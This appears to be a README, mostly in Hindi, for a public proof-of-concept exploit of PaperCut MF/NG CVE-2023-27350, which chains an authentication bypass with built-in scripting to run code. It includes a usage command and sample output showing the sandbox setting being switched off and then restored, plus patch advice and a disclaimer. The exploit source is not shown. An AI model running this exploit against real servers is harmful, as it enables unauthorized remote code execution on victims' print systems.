
Proof of Concept Exploit for PaperCut CVE-2023-27350
PaperCut MF/NG पर प्रभाव डालने वाले CVE-2023-27350 के लिए POC
भेद्यता का तकनीकी मूल कारण विश्लेषण, समझौता संकेतक और इंटरनेट एक्सपोजर हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
यह POC एक प्रमाणीकरण बाईपास भेद्यता का उपयोग करता है जिसे कोड निष्पादित करने के लिए अंतर्निहित स्क्रिप्टिंग कार्यक्षमता के दुरुपयोग के साथ जोड़ा गया है।
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
नवीनतम संस्करण में अपडेट करें या PaperCut सुरक्षा सलाहकार में दिए गए निर्देशों का पालन करके शमन करें
यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग स्पष्ट रूप से अधिकृत प्रणालियों को छोड़कर अन्य पर आक्रमण करने के लिए नहीं किया जाना चाहिए। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।